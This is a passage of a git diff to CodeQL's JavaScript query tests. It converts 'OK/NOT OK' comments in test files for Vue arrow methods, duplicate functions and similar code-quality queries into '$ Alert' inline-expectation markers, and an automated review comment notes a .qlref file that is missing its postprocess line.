if(x && o.p){} // OK, whitelisted + if(x && o.p){} // OK - whitelisted } f4(undefined); function f5(x, y) { var xy = o.q? x: y; - if(xy && o.p){} // NOT OK, not whitelisted + if(xy && o.p){} // $ Alert - not whitelisted } f5(undefined, undefined); function f6(x) { - if(!x){} // OK, whitelisted + if(!x){} // OK - whitelisted } f6(true); function f7(x) { - if(!!x){} // OK, whitelisted + if(!!x){} // OK - whitelisted } f7(true); function f8(x, y) { var xy = x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f8(undefined, undefined); function f9(x, y) { var xy = !x || y; - if(xy){} // OK, whitelisted + if(xy){} // OK - whitelisted } f9(undefined, undefined); function f10(x, y) { var xy = !!x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f10(undefined, undefined); 
@@ -103,7 +103,7 @@ function getLastLine(input) { (function(){ function g(p) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted g(p); } }; @@ -111,7 +111,7 @@ function getLastLine(input) { function f(p = false) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted f(p); } }; @@ -119,7 +119,7 @@ function getLastLine(input) { function h(p = false) { (function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted } }); diff --git a/javascript/ql/test/query-tests/Vue/ArrowMethodOnVueInstance.qlref b/javascript/ql/test/query-tests/Vue/ArrowMethodOnVueInstance.qlref index 1203930af866..71d385452e8f 100644 --- a/javascript/ql/test/query-tests/Vue/ArrowMethodOnVueInstance.qlref +++ b/javascript/ql/test/query-tests/Vue/ArrowMethodOnVueInstance.qlref @@ -1 +1,2 @@ -Vue/ArrowMethodOnVueInstance.ql \ No newline at end of file +query: Vue/ArrowMethodOnVueInstance.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Vue/tst.js b/javascript/ql/test/query-tests/Vue/tst.js index 27fe31488cbf..f0889596112a 100644 --- a/javascript/ql/test/query-tests/Vue/tst.js +++ b/javascript/ql/test/query-tests/Vue/tst.js @@ -1,16 +1,16 @@ let Vue = require('vue'); new Vue( { - created: () => this, // NOT OK + created: () => this, // $ Alert computed: { - x: () => this, // NOT OK - y: { get: () => this }, // NOT OK - z: { set: () => this } // NOT OK + x: () => this, // $ Alert + y: { get: () => this }, // $ Alert + z: { set: () => this } // $ Alert }, methods: { - arrow: () => this, // NOT OK - nonArrow: function() { this; }, // OK - arrowWithoutThis: () => 42, // OK - arrowWithNestedThis: () => (() => this) // OK + arrow: () => this, // $ Alert + nonArrow: function() { this; }, + arrowWithoutThis: () => 42, + arrowWithNestedThis: () => (() => this) } }); 
diff --git a/javascript/ql/test/query-tests/WrongExtensionJSON/WrongExtensionJSON.qlref b/javascript/ql/test/query-tests/WrongExtensionJSON/WrongExtensionJSON.qlref index d56ea60e9fdd..a93cc8ddc977 100644 --- a/javascript/ql/test/query-tests/WrongExtensionJSON/WrongExtensionJSON.qlref +++ b/javascript/ql/test/query-tests/WrongExtensionJSON/WrongExtensionJSON.qlref @@ -1 +1 @@ -LanguageFeatures/WrongExtensionJSON.ql \ No newline at end of file +query: LanguageFeatures/WrongExtensionJSON.ql diff --git a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js index 5741191d62d3..fef5cb07408f 100644 --- a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js +++ b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js @@ -1,3 +1,3 @@ { "x": 42 -} \ No newline at end of file +} // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/external/DuplicateFunction/DuplicateFunction.qlref b/javascript/ql/test/query-tests/external/DuplicateFunction/DuplicateFunction.qlref index cb39dcf5719c..66276914680d 100644 --- a/javascript/ql/test/query-tests/external/DuplicateFunction/DuplicateFunction.qlref +++ b/javascript/ql/test/query-tests/external/DuplicateFunction/DuplicateFunction.qlref @@ -1 +1,2 @@ -external/DuplicateFunction.ql \ No newline at end of file +query: external/DuplicateFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js index e6c6509eca6e..652853b992e9 100644 --- a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js +++ b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js @@ -31,7 +31,7 @@ var g2 = function() { return arguments[0] * arguments[1]; } -// OK: only five statements +// OK - only five statements function h() { if (arguments.length == 0) return 23; 
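Review bot: The `// $ Alert` marker appended to the closing brace in `tst1.js` does not appear to be checked by anything in this commit. `WrongExtensionJSON.qlref` is rewritten to `query: LanguageFeatures/WrongExtensionJSON.ql` but, unlike the other `.qlref` files changed here, gets no `postprocess: utils/test/InlineExpectationsTestQuery.ql` line. If inline expectations cannot be used for this test, I would drop the marker so the input stays the plain JSON object the query is presumably meant to flag; if they can, add the `postprocess:` line. The appended comment also changes the test input itself and not only its expectation, so it is worth confirming the expected-output file still matches.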
diff --git a/javascript/ql/test/query-tests/external/DuplicateToplevel/DuplicateToplevel.qlref b/javascript/ql/test/query-tests/external/DuplicateToplevel/DuplicateToplevel.qlref
index c295d00ec6d4..476c8ffb823d 100644
--- a/javascript/ql/test/query-tests/external/DuplicateToplevel/DuplicateToplevel.qlref
+++ b/javascript/ql/test/query-tests/external/DuplicateToplevel/DuplicateToplevel.qlref
@@ -1 +1,2 @@
-external/DuplicateToplevel.ql
\ No newline at end of file
+query: external/DuplicateToplevel.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/external/SimilarFunction/SimilarFunction.qlref b/javascript/ql/test/query-tests/external/SimilarFunction/SimilarFunction.qlref
index 6b4f3db02847..35c422516f5a 100644
--- a/javascript/ql/test/query-tests/external/SimilarFunction/SimilarFunction.qlref
+++ b/javascript/ql/test/query-tests/external/SimilarFunction/SimilarFunction.qlref
@@ -1 +1,2 @@
-external/SimilarFunction.ql
\ No newline at end of file
+query: external/SimilarFunction.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/external/SimilarToplevel/SimilarToplevel.qlref b/javascript/ql/test/query-tests/external/SimilarToplevel/SimilarToplevel.qlref
index c42b2ee3ded1..42de32840c62 100644
--- a/javascript/ql/test/query-tests/external/SimilarToplevel/SimilarToplevel.qlref
+++ b/javascript/ql/test/query-tests/external/SimilarToplevel/SimilarToplevel.qlref
@@ -1 +1,2 @@
-external/SimilarToplevel.ql
\ No newline at end of file
+query: external/SimilarToplevel.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql